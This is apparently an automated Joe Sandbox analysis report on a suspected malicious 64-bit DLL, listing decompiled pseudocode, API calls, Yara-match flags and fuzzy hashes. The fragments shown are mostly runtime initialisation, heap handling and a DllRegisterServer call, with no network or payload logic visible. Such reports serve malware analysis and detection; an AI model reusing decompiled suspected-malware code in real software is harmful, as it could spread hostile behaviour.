                                                                                                        0x7ffc123d3f35
                                                                                                        0x7ffc123d3f41
                                                                                                        0x7ffc123d3f45
                                                                                                        0x7ffc123d3f47
                                                                                                        0x7ffc123d3f4e
                                                                                                        0x7ffc123d3f52
                                                                                                        0x7ffc123d3f57
                                                                                                        0x7ffc123d3f60

                                                                                                        APIs
                                                                                                        • __isa_available_init.LIBCMT ref: 00007FFC123D3F35
                                                                                                        • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFC123D3F3A
                                                                                                          • Part of subcall function 00007FFC123D6AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFC123D6AC4
                                                                                                          • Part of subcall function 00007FFC123D6AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFC123D6AC9
                                                                                                          • Part of subcall function 00007FFC123D6AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFC123D6ACE
                                                                                                        • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFC123D3F52
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 3388242289-0
                                                                                                        • Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                        • Instruction ID: 64bd7b5ca72c1601f689782115ecfd7347c96a86e058eea154de9df51e528277
                                                                                                        • Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                        • Instruction Fuzzy Hash: 6EE0125CD0CABE45FD55277164522F5166C0F96320FC500F9D8AE421C38ECD6879E971
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC123E3F70() {
                                                                                                        				long long _v24;
                                                                                                        				long long _t5;
                                                                                                        				intOrPtr _t7;
                                                                                                        
                                                                                                        				_v24 = 0;
                                                                                                        				_t7 =  *0x1244fdd8; // 0x180000000
                                                                                                        				E00007FFC7FFC123E9600(_t5, "fx", _t7, "DllRegisterServer");
                                                                                                        				_v24 = _t5;
                                                                                                        				ExitProcess(??);
                                                                                                        			}






                                                                                                        0x7ffc123e3f74
                                                                                                        0x7ffc123e3f84
                                                                                                        0x7ffc123e3f92
                                                                                                        0x7ffc123e3f97
                                                                                                        0x7ffc123e3f9c

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID: DllRegisterServer
                                                                                                        • API String ID: 621844428-1663957109
                                                                                                        • Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                        • Instruction ID: 921249c73899c4e873628d103e58540835e408b3e80be9276daeb0602dbc833a
                                                                                                        • Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                        • Instruction Fuzzy Hash: 75D05EB8908E9682EA209F10F8453DA33A0FB89328FC00131D58C42264DFBCE239CB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC123DDEA8(void* __ecx, long long __rbx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                        				signed char _t53;
                                                                                                        				signed int _t54;
                                                                                                        				void* _t73;
                                                                                                        				long long _t77;
                                                                                                        				intOrPtr _t78;
                                                                                                        				void* _t95;
                                                                                                        				long _t98;
                                                                                                        
                                                                                                        				_t73 = _t95;
                                                                                                        				 *((long long*)(_t73 + 8)) = __rbx;
                                                                                                        				 *((long long*)(_t73 + 0x10)) = __rbp;
                                                                                                        				 *((long long*)(_t73 + 0x18)) = __rsi;
                                                                                                        				 *((long long*)(_t73 + 0x20)) = __rdi;
                                                                                                        				r14d = 0;
                                                                                                        				_t77 =  *((intOrPtr*)(0x7ffc1244f968)) + 2;
                                                                                                        				if (_t77 - 1 <= 0) goto 0x123ddefb;
                                                                                                        				 *0x7FFC1244F978 =  *0x7FFC1244F978 | 0x00000080;
                                                                                                        				goto 0x123ddf86;
                                                                                                        				 *0x7FFC1244F978 = 0x81;
                                                                                                        				if (0 == 0) goto 0x123ddf1c;
                                                                                                        				if (0 == 0) goto 0x123ddf15;
                                                                                                        				goto 0x123ddf21;
                                                                                                        				goto 0x123ddf21;
                                                                                                        				GetStdHandle(_t98);
                                                                                                        				_t21 = _t77 + 1; // 0x1
                                                                                                        				if (_t21 - 1 <= 0) goto 0x123ddf61;
                                                                                                        				_t53 = GetFileType(??); // executed
                                                                                                        				if (_t53 == 0) goto 0x123ddf61;
                                                                                                        				_t54 = _t53 & 0x000000ff;
                                                                                                        				 *((long long*)(0x7ffc1244f968)) = _t77;
                                                                                                        				if (_t54 != 2) goto 0x123ddf55;
                                                                                                        				 *0x7FFC1244F978 =  *0x7FFC1244F978 | 0x00000040;
                                                                                                        				goto 0x123ddf86;
                                                                                                        				if (_t54 != 3) goto 0x123ddf86;
                                                                                                        				 *0x7FFC1244F978 =  *0x7FFC1244F978 | 0x00000008;
                                                                                                        				goto 0x123ddf86;
                                                                                                        				 *0x7FFC1244F978 =  *0x7FFC1244F978 | 0x00000040;
                                                                                                        				 *((long long*)( *0x7FFC181BD6A8 + 0x28)) = 0xfffffffe;
                                                                                                        				_t78 =  *0x1244fd78; // 0x0
                                                                                                        				if (_t78 == 0) goto 0x123ddf86;
                                                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t98 + _t78)) + 0x18)) = 0xfffffffe;
                                                                                                        				if (1 != 3) goto 0x123ddec6;
                                                                                                        				return _t54;
                                                                                                        			}










                                                                                                        0x7ffc123ddea8
                                                                                                        0x7ffc123ddeab
                                                                                                        0x7ffc123ddeaf
                                                                                                        0x7ffc123ddeb3
                                                                                                        0x7ffc123ddeb7
                                                                                                        0x7ffc123ddec3
                                                                                                        0x7ffc123ddee7
                                                                                                        0x7ffc123ddeef
                                                                                                        0x7ffc123ddef1
                                                                                                        0x7ffc123ddef6
                                                                                                        0x7ffc123ddefb
                                                                                                        0x7ffc123ddf04
                                                                                                        0x7ffc123ddf09
                                                                                                        0x7ffc123ddf13
                                                                                                        0x7ffc123ddf1a
                                                                                                        0x7ffc123ddf21
                                                                                                        0x7ffc123ddf2a
                                                                                                        0x7ffc123ddf32
                                                                                                        0x7ffc123ddf37
                                                                                                        0x7ffc123ddf3f
                                                                                                        0x7ffc123ddf41
                                                                                                        0x7ffc123ddf44
                                                                                                        0x7ffc123ddf4c
                                                                                                        0x7ffc123ddf4e
                                                                                                        0x7ffc123ddf53
                                                                                                        0x7ffc123ddf58
                                                                                                        0x7ffc123ddf5a
                                                                                                        0x7ffc123ddf5f
                                                                                                        0x7ffc123ddf61
                                                                                                        0x7ffc123ddf66
                                                                                                        0x7ffc123ddf6f
                                                                                                        0x7ffc123ddf79
                                                                                                        0x7ffc123ddf7f
                                                                                                        0x7ffc123ddf8f
                                                                                                        0x7ffc123ddfaf

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileHandleType
                                                                                                        • String ID:
                                                                                                        • API String ID: 3000768030-0
                                                                                                        • Opcode ID: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
                                                                                                        • Instruction ID: 444250b2f8d10af5765b518ce82cfc11f8160558f6354b07a288a7db1013f971
                                                                                                        • Opcode Fuzzy Hash: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
                                                                                                        • Instruction Fuzzy Hash: 3031842AA18F6E91E7608B1485441B87A58FB85BB0BE40379EB6E473E0CF78E471C311
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 68%
                                                                                                        			E00007FFC7FFC123DA9DC(intOrPtr* __rax, void* __rcx) {
                                                                                                        				int _t1;
                                                                                                        				intOrPtr _t3;
                                                                                                        				void* _t4;
                                                                                                        				void* _t11;
                                                                                                        				intOrPtr _t14;
                                                                                                        
                                                                                                        				if (__rcx == 0) goto 0x123daa17;
                                                                                                        				_t14 =  *0x1244f930; // 0x1b07dc10000, executed
                                                                                                        				_t1 = HeapFree(_t11, ??); // executed
                                                                                                        				if (_t1 != 0) goto 0x123daa12;
                                                                                                        				_t3 = E00007FFC7FFC123DB34C(GetLastError(), __rax, _t14, __rcx);
                                                                                                        				_t4 = E00007FFC7FFC123DB420(__rax);
                                                                                                        				 *__rax = _t3;
                                                                                                        				return _t4;
                                                                                                        			}








                                                                                                        0x7ffc123da9df
                                                                                                        0x7ffc123da9eb
                                                                                                        0x7ffc123da9f2
                                                                                                        0x7ffc123da9fa
                                                                                                        0x7ffc123daa04
                                                                                                        0x7ffc123daa0b
                                                                                                        0x7ffc123daa10
                                                                                                        0x7ffc123daa17

                                                                                                        APIs
                                                                                                        • RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFC123DF492,?,?,?,00007FFC123DF4CF,?,?,00000000,00007FFC123DF144,?,?,?,00007FFC123DF077), ref: 00007FFC123DA9F2
                                                                                                        • GetLastError.KERNEL32(?,?,00000000,00007FFC123DF492,?,?,?,00007FFC123DF4CF,?,?,00000000,00007FFC123DF144,?,?,?,00007FFC123DF077), ref: 00007FFC123DA9FC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastPrivilegeRelease
                                                                                                        • String ID:
                                                                                                        • API String ID: 1334314998-0
                                                                                                        • Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                        • Instruction ID: 81b81c8cf6e18e8299a9fbccac5443e3db3a55168ae8f1164a23d754fdc8dfd5
                                                                                                        • Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                        • Instruction Fuzzy Hash: 29E0861CF09D1E53FF095BB155440F421595FD8720FC04074C80D46252EEACECB5D234
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.278874507.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                        • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                        • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC123D22B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
                                                                                                        				long long _v16;
                                                                                                        				signed char _v24;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				intOrPtr* _t50;
                                                                                                        
                                                                                                        				_t48 = __rax;
                                                                                                        				_a24 = r8b;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC123D2830(__rax, _a8);
                                                                                                        				if (_t48 - _a16 >= 0) goto 0x123d22de;
                                                                                                        				E00007FFC7FFC123D2230(_a8);
                                                                                                        				E00007FFC7FFC123D2150(_t48, _a8);
                                                                                                        				if ( *_t48 - _a16 >= 0) goto 0x123d2310;
                                                                                                        				E00007FFC7FFC123D2170(_t48, _a8);
                                                                                                        				E00007FFC7FFC123D2600(_a8, _a16,  *_t48); // executed
                                                                                                        				goto 0x123d237a;
                                                                                                        				if ((_a24 & 0x000000ff) == 0) goto 0x123d2366;
                                                                                                        				if (_a16 - 0x10 >= 0) goto 0x123d2366;
                                                                                                        				E00007FFC7FFC123D2170(_t48, _a8);
                                                                                                        				if (_a16 -  *_t48 >= 0) goto 0x123d2341;
                                                                                                        				_t50 = _a16;
                                                                                                        				_v16 = _t50;
                                                                                                        				goto 0x123d2353;
                                                                                                        				E00007FFC7FFC123D2170(_t50, _a8);
                                                                                                        				_v16 =  *_t50;
                                                                                                        				E00007FFC7FFC123D1910(1,  *_t50, _a8, _v16);
                                                                                                        				goto 0x123d237a;
                                                                                                        				if (_a16 != 0) goto 0x123d237a;
                                                                                                        				E00007FFC7FFC123D23A0( *_t50, _a8, _a16);
                                                                                                        				if (_a16 <= 0) goto 0x123d238c;
                                                                                                        				_v24 = 1;
                                                                                                        				goto 0x123d2394;
                                                                                                        				_v24 = 0;
                                                                                                        				return _v24 & 0x000000ff;
                                                                                                        			}







                                                                                                        0x7ffc123d22b0
                                                                                                        0x7ffc123d22b0
                                                                                                        0x7ffc123d22b5
                                                                                                        0x7ffc123d22ba
                                                                                                        0x7ffc123d22c8
                                                                                                        0x7ffc123d22d2
                                                                                                        0x7ffc123d22d9
                                                                                                        0x7ffc123d22e3
                                                                                                        0x7ffc123d22f0
                                                                                                        0x7ffc123d22f7
                                                                                                        0x7ffc123d2309
                                                                                                        0x7ffc123d230e
                                                                                                        0x7ffc123d2317
                                                                                                        0x7ffc123d231f
                                                                                                        0x7ffc123d2326
                                                                                                        0x7ffc123d2333
                                                                                                        0x7ffc123d2335
                                                                                                        0x7ffc123d233a
                                                                                                        0x7ffc123d233f
                                                                                                        0x7ffc123d2346
                                                                                                        0x7ffc123d234e
                                                                                                        0x7ffc123d235f
                                                                                                        0x7ffc123d2364
                                                                                                        0x7ffc123d236c
                                                                                                        0x7ffc123d2375
                                                                                                        0x7ffc123d2380
                                                                                                        0x7ffc123d2382
                                                                                                        0x7ffc123d238a
                                                                                                        0x7ffc123d238c
                                                                                                        0x7ffc123d239d

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D2830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D283E
                                                                                                          • Part of subcall function 00007FFC123D2830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFC123D284B
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D22D9
                                                                                                          • Part of subcall function 00007FFC123D2170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D217E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
                                                                                                        • String ID:
                                                                                                        • API String ID: 1903167320-0
                                                                                                        • Opcode ID: aff1851cebf3f965b07721a628662be7775e5ed75af6ef4fe029cf6c3e1b761c
                                                                                                        • Instruction ID: 8c621a9bc4af3f84e2ffb7526f7744ff89a0217f2d2b8ca0ae1003ce7c62af27
                                                                                                        • Opcode Fuzzy Hash: aff1851cebf3f965b07721a628662be7775e5ed75af6ef4fe029cf6c3e1b761c
                                                                                                        • Instruction Fuzzy Hash: 1021FE2A90CE9D82DB109A15E4503AE6774FBC57B0FD04471E78D4766ACEADD460CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC123DAAD0(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                        				intOrPtr* _t22;
                                                                                                        				signed int _t29;
                                                                                                        
                                                                                                        				_t29 = __rdx;
                                                                                                        				if (__rcx == 0) goto 0x123daaef;
                                                                                                        				_t1 = _t29 - 0x20; // -32
                                                                                                        				_t22 = _t1;
                                                                                                        				if (_t22 - __rdx < 0) goto 0x123dab32;
                                                                                                        				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                        				goto 0x123dab16;
                                                                                                        				if (E00007FFC7FFC123DE958() == 0) goto 0x123dab32;
                                                                                                        				if (E00007FFC7FFC123D97EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x123dab32;
                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                        				if (_t22 == 0) goto 0x123dab01;
                                                                                                        				goto 0x123dab3f;
                                                                                                        				E00007FFC7FFC123DB420(_t22);
                                                                                                        				 *_t22 = 0xc;
                                                                                                        				return 0;
                                                                                                        			}





                                                                                                        0x7ffc123daad0
                                                                                                        0x7ffc123daadf
                                                                                                        0x7ffc123daae3
                                                                                                        0x7ffc123daae3
                                                                                                        0x7ffc123daaed
                                                                                                        0x7ffc123daafb
                                                                                                        0x7ffc123daaff
                                                                                                        0x7ffc123dab08
                                                                                                        0x7ffc123dab14
                                                                                                        0x7ffc123dab25
                                                                                                        0x7ffc123dab2e
                                                                                                        0x7ffc123dab30
                                                                                                        0x7ffc123dab32
                                                                                                        0x7ffc123dab37
                                                                                                        0x7ffc123dab44

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FFC123DBAAE,?,?,?,00007FFC123DB429,?,?,?,?,00007FFC123E0426,?,?,00000000), ref: 00007FFC123DAB25
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                        • Instruction ID: 8622c05b044b352195a5798f226792eb49fe072ad35ef0ac2f76b45de1a40eb4
                                                                                                        • Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                        • Instruction Fuzzy Hash: A8F0490CF0AA2F41FE585B6196112F5129A5FD8B60FCC5470C80E862D2EDECE9B3C234
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC123DAA18(intOrPtr* __rax, void* __rcx) {
                                                                                                        
                                                                                                        				if (__rcx - 0xffffffe0 > 0) goto 0x123daa63;
                                                                                                        				_t16 =  ==  ? __rax : __rcx;
                                                                                                        				goto 0x123daa4a;
                                                                                                        				if (E00007FFC7FFC123DE958() == 0) goto 0x123daa63;
                                                                                                        				if (E00007FFC7FFC123D97EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0x123daa63;
                                                                                                        				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                        				if (__rax == 0) goto 0x123daa35;
                                                                                                        				goto 0x123daa70;
                                                                                                        				E00007FFC7FFC123DB420(__rax);
                                                                                                        				 *__rax = 0xc;
                                                                                                        				return 0;
                                                                                                        			}



                                                                                                        0x7ffc123daa25
                                                                                                        0x7ffc123daa2f
                                                                                                        0x7ffc123daa33
                                                                                                        0x7ffc123daa3c
                                                                                                        0x7ffc123daa48
                                                                                                        0x7ffc123daa56
                                                                                                        0x7ffc123daa5f
                                                                                                        0x7ffc123daa61
                                                                                                        0x7ffc123daa63
                                                                                                        0x7ffc123daa68
                                                                                                        0x7ffc123daa75

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(?,?,?,00007FFC123E040D,?,?,00000000,00007FFC123DD8B7,?,?,?,00007FFC123DA427,?,?,?,00007FFC123DA31D), ref: 00007FFC123DAA56
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        • Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                        • Instruction ID: def6e046f66a9f6e35a8ecdcc5da6a60cdbd4fbe32d0415b32c772b7aa5be912
                                                                                                        • Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                        • Instruction Fuzzy Hash: 04F03A0DE09A2F45FA5456615B412F511984FC4770FCC07B0D82E452C2DDECA462C630
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 44%
                                                                                                        			E00007FFC7FFC123D1540(long long __rcx, long long _a8) {
                                                                                                        				long long _v24;
                                                                                                        				intOrPtr* _t9;
                                                                                                        				long long _t13;
                                                                                                        
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v24 = 0xfffffffe;
                                                                                                        				r8d = 0;
                                                                                                        				E00007FFC7FFC123D1910(1, _t9, _a8, _t13); // executed
                                                                                                        				return E00007FFC7FFC123D17A0(_a8);
                                                                                                        			}






                                                                                                        0x7ffc123d1540
                                                                                                        0x7ffc123d1549
                                                                                                        0x7ffc123d1552
                                                                                                        0x7ffc123d155c
                                                                                                        0x7ffc123d1571

                                                                                                        APIs
                                                                                                        • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D1567
                                                                                                          • Part of subcall function 00007FFC123D17A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D17B1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.279325245.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.279243447.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279375197.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279532482.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279539840.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279547008.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.279581563.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7ffc123d0000_loaddll64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::EmptyQueue::StructuredWork
                                                                                                        • String ID:
                                                                                                        • API String ID: 1865873047-0
